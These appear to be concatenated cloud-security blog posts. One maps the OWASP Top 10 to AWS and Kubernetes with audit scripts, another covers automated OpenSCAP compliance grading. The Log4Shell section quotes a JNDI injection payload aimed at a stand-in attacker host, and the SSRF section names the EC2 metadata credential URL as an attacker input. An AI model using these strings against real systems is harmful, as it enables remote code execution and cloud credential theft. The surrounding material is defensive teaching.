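    return flagged


sample = """
# local settings
DATABASE_URL=postgres://user:password@host/db
API_BASE=https://example.com/v1
"""
print(env_vars_with_embedded_passwords(sample))
```

Run as a pre-commit hook, a check like this fails the commit instead of relying on someone noticing the secret in review.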

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application that logged the header with a vulnerable Log4j 2.x release (2.0-beta9 through 2.14.1).

The fix was not “validate user input better.” The fix was patching Log4j and, for SSRF, enforcing IMDSv2, which requires a session token that is obtained with a PUT request and then sent as a header on every metadata call, something a naive SSRF cannot produce.

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container started with docker run --privileged, or a Kubernetes container with securityContext.privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed; they were never designed in. Namespace isolation offers little protection once a container holds CAP_SYS_ADMIN, because that capability permits operations such as mounting filesystems. The attacker doesn’t exploit a vulnerability; they use capabilities the design granted.
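
These design gaps sit at the container level, so an audit has to look inside each container's securityContext. The sketch below is one possible check over the JSON from kubectl get pods -A -o json, loaded as a dict. The function name and the set of capabilities treated as risky are assumptions. It only flags allowPrivilegeEscalation when explicitly set to true, although Kubernetes also treats an unset value as true.

```python
RISKY_CAPABILITIES = {"SYS_ADMIN", "CAP_SYS_ADMIN", "ALL"}


def risky_containers(pod_list: dict) -> list[str]:
    """Return 'namespace/pod/container: reasons' for containers with risky settings."""
    findings = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        spec = pod.get("spec", {})
        containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
        for container in containers:
            ctx = container.get("securityContext") or {}
            added = set((ctx.get("capabilities") or {}).get("add") or [])
            reasons = []
            if ctx.get("privileged") is True:
                reasons.append("privileged")
            if ctx.get("allowPrivilegeEscalation") is True:
                reasons.append("allowPrivilegeEscalation")
            risky = sorted(added & RISKY_CAPABILITIES)
            if risky:
                reasons.append("cap:" + "+".join(risky))
            if reasons:
                findings.append(
                    f"{meta.get('namespace')}/{meta.get('name')}/{container.get('name')}: "
                    + ", ".join(reasons)
                )
    return findings


pods = {"items": [{
    "metadata": {"namespace": "prod", "name": "web"},
    "spec": {"containers": [
        {"name": "app", "securityContext": {"privileged": True}},
        {"name": "safe", "securityContext": {"allowPrivilegeEscalation": False}},
    ]},
}]}
print(risky_containers(pods))
```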

# Find pods with a privileged container or without pod-level runAsNonRoot
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(
      any(.spec.containers[]; .securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) |
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: A cluster-admin ClusterRoleBinding granted to the default service account. etcd port 2379 reachable from the pod network. AWS security groups that allow 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because older Kubernetes versions did not ship secure defaults. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# List every ClusterRoleBinding that grants cluster-admin, with its subjects (review any non-system subjects)
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, then inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The backdoor targeted SSH servers on systems using systemd. Had it not been caught five weeks before broad distribution release, it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# Check whether the account root user has MFA enabled (1 = enabled, 0 = not enabled)
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read -r user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
# RepoDigests holds the registry manifest digest; .Id is only the local image ID
docker inspect your-registry/your-image:tag --format='{{index .RepoDigests 0}}'
# Compare this digest to the pinned value in your deployment manifest
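The grep above prints any line that lacks a 40-character hex string, which also flags local actions (./path) and ignores whether the hex string is really the reference. A slightly stricter sketch follows, assuming one `uses:` reference per line. The function name unpinned_action_refs is made up for this example, and skipping ./ and docker:// references is a choice of the sketch, not a rule.

```shell
# unpinned_action_refs FILE...
# Prints "file:line: ref" for every uses: reference that is not pinned
# to a full 40-character lowercase hex commit SHA.
unpinned_action_refs() {
  awk -v q="'" '
    /^[ \t]*(-[ \t]*)?uses:[ \t]*/ {
      ref = $0
      sub(/^[ \t]*(-[ \t]*)?uses:[ \t]*/, "", ref)   # keep only the reference
      sub(/[ \t]+#.*$/, "", ref)                      # drop a trailing comment
      gsub("[\"" q "]", "", ref)                      # drop surrounding quotes
      sub(/[ \t\r]+$/, "", ref)                       # drop trailing whitespace
      # Local actions and container images are out of scope for this check
      if (ref ~ /^\.\// || ref ~ /^docker:\/\//) next
      sha = substr(ref, index(ref, "@") + 1)
      if (index(ref, "@") == 0 || length(sha) != 40 || sha ~ /[^0-9a-f]/)
        print FILENAME ":" FNR ": " ref
    }
  ' "$@"
}

# Typical call from the repository root:
#   unpinned_action_refs .github/workflows/*.yml
```

An empty result means every third-party action is pinned to a commit SHA. Any printed line is a reference whose content can change without a change in your repository.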

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify a multi-region CloudTrail trail exists
aws cloudtrail describe-trails --include-shadow-trails \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,HomeRegion:HomeRegion}'
# Then confirm each trail is actually logging:
#   aws cloudtrail get-trail-status --name <trail-name> --query IsLogging

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had an SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication: any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was roughly 100 million records exfiltrated.

IMDSv2 requires a PUT request to obtain a session token before credentials can be retrieved, so an SSRF limited to GET requests cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP Category                    Purple Team Episode
A01 Broken Access Control         EP04: Broken access control in AWS
A02 Cryptographic Failures        EP06 (partial): CI/CD secrets exposure
A03 Injection                     EP07: SSRF to cloud metadata
A04 Insecure Design               EP08: Kubernetes container escape
A05 Security Misconfiguration     EP08: Kubernetes container escape
A06 Vulnerable Components         EP09: Supply chain attacks
A07 Authentication Failures       EP05: MFA fatigue attacks
A08 SW/Data Integrity             EP06: CI/CD secrets exposure, EP09: Supply chain
A09 Logging/Monitoring Failures   EP11: Detection engineering with eBPF
A10 SSRF                          EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
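echo "--- GuardDuty status in current region ---"
# list-detectors exits 0 with empty output when GuardDuty is off, so test the output
detectors=$(aws guardduty list-detectors --query 'DetectorIds' --output text 2>/dev/null)
[ -n "$detectors" ] && echo "ENABLED: $detectors" || echo "DISABLED"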

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
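echo "--- CloudTrail multi-region trail ---"
# describe-trails exits 0 with empty output when no trail matches, so test the output
trails=$(aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text 2>/dev/null)
[ -n "$trails" ] && echo "$trails" || echo "WARN: No multi-region trail"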

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[] | [?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The other nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.


Quick Reference

OWASP   Cloud Infrastructure Equivalent                            Detection Tool
A01     IAM wildcards, public S3, broad trust policies             AWS Config, CloudTrail
A02     Plaintext secrets in env vars, unencrypted S3              TruffleHog, Macie
A03     SSRF, Log4j JNDI injection                                 WAF logs, CloudTrail IMDS calls
A04     Privileged containers, no seccomp                          OPA/Gatekeeper, Falco
A05     K8s RBAC defaults, open etcd, open SGs                     kube-bench, AWS Config
A06     Unpatched base images, transitive CVEs, supply chain       Trivy, Grype, SLSA
A07     MFA fatigue, long-lived sessions, stolen tokens            GuardDuty, Okta logs
A08     Unsigned images, mutable CI references, build compromise   Cosign, SLSA, OIDC
A09     No CloudTrail, no GuardDuty, no runtime telemetry          AWS Security Hub
A10     IMDSv1 on EC2, SSRF to internal endpoints                  VPC Flow Logs, CloudTrail

Key Takeaways

  • OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
  • A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
  • A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
  • A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
  • A09 (Logging/Monitoring) failures are what turn a breach in any of the other nine categories from “detectable” into “11-day dwell time”
  • Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
  • Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through March 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes (identity, supply chain, misconfiguration), and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.


Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment

Reading Time: 6 minutes

OS Hardening as Code, Episode 4


TL;DR

  • “We use CIS L1” means nothing without a verified grade — automated OpenSCAP compliance provides one before any instance is deployed
  • Stratum runs OpenSCAP after every build and attaches the grade to the image metadata: cis-l1-A-98
  • Grades are A through F based on percentage of controls passing, with explicit accounting for documented overrides
  • SARIF output is machine-readable — importable directly into GitHub Advanced Security, Jira, or any SIEM
  • Drift detection: rescan any running instance against the original blueprint and see exactly which controls changed since the image was built
  • An image that scores below your minimum grade threshold doesn’t get snapshotted — it doesn’t exist

The Problem: A Grade That’s Never Been Verified Is Not a Grade

Security audit request:
"Provide CIS L1 compliance evidence for all production instances"

Team response:
  Instance A: "CIS L1 hardened" — OpenSCAP last run: 4 months ago
  Instance B: "CIS L1 hardened" — OpenSCAP last run: never
  Instance C: "CIS L1 hardened" — OpenSCAP version: 1.2 (current: 1.3.8)
  Instance D: "CIS L1 hardened" — manual scan output: "87% passing"
  Instance E: "CIS L1 hardened" — manual scan output: "91% passing"

"Which profile was used for D and E? Are they comparable?"
"Were they scanned before or after a recent kernel update?"
"Why is C running an old OpenSCAP version?"

Automated OpenSCAP compliance means the grade is generated the same way, on every image, every time, before the image is ever deployed.

EP03 showed that the same HardeningBlueprint YAML builds consistent OS images across six cloud providers. What it left open is the question every auditor eventually asks: how do you know the Ansible hardening actually did what you think it did? Running Ansible-Lockdown successfully means the tasks ran. It does not mean every CIS control is satisfied — some controls can’t be applied by Ansible alone, some require manual verification, and some interact with the environment in unexpected ways.


A compliance team requested CIS L2 evidence for a SOC 2 Type II audit. The security team had been running OpenSCAP scans — but manually, on-demand, using slightly different profiles across teams, with no standard for how to store or compare results.

The audit found four problems:
1. Two instances had been scanned with CIS L1, not L2, despite being labeled “CIS L2”
2. Three instances hadn’t been scanned in over six months
3. The scan outputs from different teams were in different formats (HTML vs XML vs text)
4. Two instances showed “91% passing” and “89% passing” — with no documentation of whether those were acceptable thresholds or what the failing controls were

The audit took two weeks to resolve. The finding wasn’t a security failure — it was a documentation and process failure. But it consumed two weeks of engineering time and appeared in the audit report as a gap.

The root cause: compliance scanning was a manual step that produced inconsistent output in an inconsistent format.


How Automated OpenSCAP Compliance Works

Every Stratum build ends with an automated OpenSCAP scan:

stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
      │
      ├─ Provisions build instance
      │
      ├─ Runs Ansible-Lockdown (144 tasks)
      │
      ├─ Runs post-build OpenSCAP scan
      │    ├── Profile: CIS Ubuntu 22.04 L1 (from blueprint)
      │    ├── OpenSCAP version: pinned in blueprint (default: latest)
      │    └── 100 controls checked
      │
      ├─ Calculates grade
      │    ├── Passing:   92 controls
      │    ├── Failing:   6 controls
      │    ├── Overrides: 2 (documented in blueprint)
      │    └── Grade: A (94/100 effective, 98% pass rate)
      │
      ├─ Writes to image metadata:
      │    compliance_grade=cis-l1-A-94
      │    compliance_scan_date=2026-04-19
      │    [email protected]
      │
      └─ Snapshots AMI (or fails if grade < min_grade)

The grade is written into the AMI (or GCP/Azure image) metadata at creation time. It travels with the image. Any instance launched from this AMI carries the provenance of what was applied and what grade was achieved.
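Because the grade travels as a plain string, anything downstream can read it back. Here is a minimal sketch of a parser, assuming the tag always has the shape <benchmark>-<letter>-<score> as in cis-l1-A-94. The helper name parse_compliance_grade is hypothetical and is not a Stratum command.

```shell
# parse_compliance_grade TAG -> prints "<benchmark> <letter> <score>"
# Assumption: the benchmark may contain hyphens (cis-l1), so the tag is
# split from the right-hand side.
parse_compliance_grade() {
  local tag="$1"
  local score="${tag##*-}"       # text after the last hyphen
  local rest="${tag%-*}"         # tag without "-<score>"
  local grade="${rest##*-}"      # letter just before the score
  local benchmark="${rest%-*}"   # everything before "-<letter>"

  case "$grade" in
    A|B|C|D|F) ;;
    *) echo "unrecognized compliance tag: $tag" >&2; return 1 ;;
  esac
  case "$score" in
    ''|*[!0-9]*) echo "unrecognized compliance tag: $tag" >&2; return 1 ;;
  esac
  if [ "$benchmark" = "$rest" ]; then
    echo "unrecognized compliance tag: $tag" >&2
    return 1
  fi
  echo "$benchmark $grade $score"
}

parse_compliance_grade "cis-l1-A-94"
```

A launch script could call this on the image's compliance_grade value and refuse to continue when the parse fails or the letter is below what the environment allows.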


The A-F Grade Calculation

The grade is not a simple percentage. It accounts for documented overrides and applies a threshold-based letter scale:

Total CIS controls:    100
Passing:               92
Failing:               6 (genuine failures)
Overrides (compliant): 2 (documented in blueprint, counted as passing)

Effective passing:     94 / 100
Grade:                 A

Grade thresholds (configurable per blueprint):

Grade   Default threshold   Meaning
A       ≥ 95% effective     Production-ready, minimal exceptions
B       85–94%              Acceptable with documented exceptions
C       70–84%              Below standard; deploy with caution
D       55–69%              Significant gaps; do not deploy to production
F       < 55%               Hardening failed; image not snapshotted

The thresholds are configurable in the blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  min_grade: B          # Build fails if grade < B
  grade_thresholds:
    A: 95
    B: 85
    C: 70
    D: 55

If the build produces a grade below min_grade, the instance is terminated and no image is created. The failure is logged with the full list of controls that blocked the grade.
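The arithmetic behind the grade and the min_grade gate is small enough to sketch in a few shell functions. The function names and argument order here are illustrative assumptions, not Stratum's actual implementation. Note that with the default thresholds exactly as listed, an effective score of 94 lands in the B band. A blueprint would need a lower A threshold (the optional arguments below) for that score to grade A.

```shell
# effective_score PASSING OVERRIDES TOTAL -> integer percentage, rounded down
effective_score() {
  echo $(( ($1 + $2) * 100 / $3 ))
}

# letter_grade SCORE [A_MIN B_MIN C_MIN D_MIN] -> A, B, C, D or F
# The defaults mirror the default thresholds listed above.
letter_grade() {
  local score="$1" a="${2:-95}" b="${3:-85}" c="${4:-70}" d="${5:-55}"
  if   [ "$score" -ge "$a" ]; then echo A
  elif [ "$score" -ge "$b" ]; then echo B
  elif [ "$score" -ge "$c" ]; then echo C
  elif [ "$score" -ge "$d" ]; then echo D
  else echo F
  fi
}

# grade_rank LETTER -> numeric rank so letters can be compared
grade_rank() {
  case "$1" in
    A) echo 4 ;; B) echo 3 ;; C) echo 2 ;; D) echo 1 ;; *) echo 0 ;;
  esac
}

# meets_min_grade GRADE MIN_GRADE -> exit status 0 when GRADE is at least MIN_GRADE
meets_min_grade() {
  [ "$(grade_rank "$1")" -ge "$(grade_rank "$2")" ]
}

score=$(effective_score 92 2 100)   # 92 passing plus 2 documented overrides
grade=$(letter_grade "$score")
echo "effective=$score grade=$grade"
if meets_min_grade "$grade" B; then
  echo "min_grade satisfied: snapshot the image"
else
  echo "below min_grade: terminate the build instance"
fi
```

Keeping the letter-to-rank mapping in one function means the gate compares numbers rather than strings, so a custom threshold set changes only the arguments to letter_grade.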


Reading the Scan Output

# Show the last build's scan results
stratum scan --show-last --blueprint ubuntu22-cis-l1.yaml

# Output:
# Build: ubuntu22-cis-l1 @ 2026-04-19T15:42:01Z
# Provider: aws (ap-south-1)
# Grade: A (94/100 effective controls)
#
# Passing controls: 92
# Failing controls: 6
# ──────────────────────────────────────────────
# FAIL  1.1.7   Ensure separate partition for /var/log/audit
#       Reason: tmpfs used — separate block device not configured
#       Remediation: Add /var/log/audit to separate EBS volume
#
# FAIL  1.6.1.3 Ensure AppArmor is enabled in bootloader config
#       Reason: GRUB_CMDLINE_LINUX missing apparmor=1 security=apparmor
#       Remediation: Update /etc/default/grub, run update-grub, reboot
#
# FAIL  3.1.1   Ensure IPv6 is disabled if not needed
#       Reason: net.ipv6.conf.all.disable_ipv6=0
#       Remediation: Set in /etc/sysctl.d/60-kernel-hardening.conf
# ...
#
# Overrides (compliant): 2
# ──────────────────────────────────────────────
# OVERRIDE  1.1.2   tmpfs /tmp via systemd unit — equivalent control
# OVERRIDE  5.2.4   SSH timeout managed by session manager policy

The failing controls tell you exactly what to fix and how to fix it. This is the difference between “87% passing” as a number and “87% passing” as an actionable gap list.


SARIF Export

Every scan produces a SARIF (Static Analysis Results Interchange Format) file:

# Export scan results to SARIF
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --out-file scan-results/i-0abc123-cis-l1.sarif

SARIF is an OASIS standard format for static-analysis results. It can be imported into:

  • GitHub Advanced Security: upload via github/codeql-action/upload-sarif, results appear in the Security tab
  • Jira: import as security findings, linked to the image or instance ID
  • Splunk / SIEM: structured JSON, parseable as events
  • AWS Security Hub: importable as findings via the Security Hub API, after conversion to the AWS Security Finding Format (ASFF)

For audit purposes, the SARIF file is the evidence artifact. It contains the full scan profile, every control result, the OpenSCAP version, the scan timestamp, and the machine it was run against.
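To make the shape of that artifact concrete, here is a minimal sketch that prints a SARIF 2.1.0 log with one run and two results. It shows only the required skeleton (version, runs, tool.driver.name, results) and is not a reproduction of what Stratum emits. The tool name example-scanner is a placeholder, and the helpers assume their inputs contain no characters that need JSON escaping.

```shell
# sarif_result RULE_ID LEVEL MESSAGE -> one SARIF result object
# LEVEL is one of: none, note, warning, error
sarif_result() {
  printf '{"ruleId":"%s","level":"%s","message":{"text":"%s"}}' "$1" "$2" "$3"
}

# sarif_document TOOL_NAME RESULTS -> a complete SARIF 2.1.0 log
# RESULTS is a comma-separated list of objects built with sarif_result
sarif_document() {
  printf '{"version":"2.1.0","$schema":"https://json.schemastore.org/sarif-2.1.0.json","runs":[{"tool":{"driver":{"name":"%s"}},"results":[%s]}]}\n' "$1" "$2"
}

results="$(sarif_result '1.1.7' error 'Ensure separate partition for /var/log/audit')"
results="$results,$(sarif_result '3.1.1' warning 'Ensure IPv6 is disabled if not needed')"
sarif_document "example-scanner" "$results"
```

Each failing control becomes one result keyed by its control ID, which is what lets a consumer such as a code-scanning dashboard group and track findings across scans.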

# Upload to GitHub Advanced Security
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --github-upload \
  --github-ref "$GITHUB_REF" \
  --github-sha "$GITHUB_SHA"

Drift Detection

The grade at build time is the baseline. Any instance can be rescanned against the blueprint that built it:

# Rescan a running instance
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Output:
# Instance: i-0abc123 (launched from ami-0a7f3c9e82d1b4c05)
# Original grade (build):  A (94/100) — 2026-01-15
# Current grade (rescan):  B (87/100) — 2026-04-19
#
# Drifted controls (7):
#   3.3.2  TCP SYN cookies: FAIL — net.ipv4.tcp_syncookies=0
#           Last passing: 2026-01-15 (build)
#           Current value: 0 (expected: 1)
#
#   5.3.2  sudo log_input: FAIL — rule removed from /etc/sudoers.d/
#           Last passing: 2026-01-15 (build)
#           Current value: [rule absent] (expected: Defaults log_input)

Drift detection is how you find the instances that were “temporarily” modified and never reverted. The scan compares the current state against the baseline — not against a generic CIS profile, but against the specific blueprint version that built the image.
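The comparison itself is a diff of two result sets. A minimal sketch follows, assuming each scan has been flattened to one "<control-id> <pass|fail>" pair per line. That flat format and the function name drifted_controls are hypothetical; the episode does not show Stratum's stored result format.

```shell
# drifted_controls BASELINE CURRENT
# Prints the control IDs that passed in BASELINE and fail in CURRENT.
# Both arguments are distinct files with "<control-id> <pass|fail>" lines.
drifted_controls() {
  awk '
    FILENAME == ARGV[1] { baseline[$1] = $2; next }      # remember build-time status
    baseline[$1] == "pass" && $2 == "fail" { print $1 }  # passed then, fails now
  ' "$1" "$2"
}

tmp=$(mktemp -d)
printf '%s\n' '3.3.2 pass' '5.3.2 pass' '1.1.7 fail' > "$tmp/build.txt"
printf '%s\n' '3.3.2 fail' '5.3.2 fail' '1.1.7 fail' > "$tmp/rescan.txt"
drifted_controls "$tmp/build.txt" "$tmp/rescan.txt"
rm -rf "$tmp"
```

Control 1.1.7 fails in both files, so it is not reported. It was a known gap at build time, not drift.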


Scanning Without a Build: Assessing Existing Instances

For instances not built with Stratum, you can run a standalone scan:

# Assess an existing instance against CIS L1
stratum scan --instance i-0legacy123 --benchmark cis-l1

# No blueprint comparison — just the raw CIS grade
# Output:
# Grade: C (72/100)
# 28 controls failing
# ...

This is useful for assessing the state of instances built before Stratum was in use, or for comparing a manual hardening approach against the benchmark.


What Controls Typically Block an A Grade

For Ubuntu 22.04 CIS L1 builds in most cloud environments, these are the controls that most commonly prevent an A grade:

Control                                   Why it often fails                                       Fix
1.1.7 /var/log/audit separate partition   Cloud images don’t have separate volumes at build time   Add EBS volume, configure at launch
1.6.1 AppArmor bootloader config          GRUB parameters not set correctly                        Update /etc/default/grub, run update-grub
3.1.1 Disable IPv6                        Cloud networking sometimes requires IPv6                 Override with documented reason if intentional
5.2.21 SSH MaxStartups                    Default sshd_config not updated                          Add MaxStartups 10:30:60 to sshd_config
6.1.10 World-writable files               Some package installations leave world-writable files    Post-install cleanup in Ansible role

The first two (separate audit partition, AppArmor bootloader) are the most common A→B blockers and often require architecture decisions about how volumes are provisioned at launch versus build time.


Key Takeaways

  • Automated OpenSCAP compliance means every image has a verified, reproducible grade generated by the same scanner with the same profile, before it’s ever deployed
  • The A-F grade accounts for documented overrides from the blueprint — the failing controls in the output are genuine gaps, not known exceptions
  • SARIF export makes scan results importable into GitHub Advanced Security, Jira, SIEM, and audit tooling
  • Drift detection catches configuration changes that happen after the image is deployed — the grade at build time is the baseline
  • Images that score below min_grade don’t get snapshotted — the failed build tells you exactly which controls to fix

What’s Next

Automated OpenSCAP compliance gives every image a verified grade before deployment. What this episode leaves open is what happens after the grade is known: specifically, what prevents an engineer from deploying a C-grade image to production “just this once.”

The Pipeline API is the answer. EP05 covers the CI/CD compliance gate: POST /api/pipeline/scan fails the build if the image grade is below threshold. The unhardened image never reaches production — not because engineers are disciplined, but because the pipeline won’t let it through.

Next: CI/CD compliance gate — block unhardened images before they reach production


What Is Purple Team Security: Red + Blue = Better Defense

Reading Time: 8 minutes



TL;DR

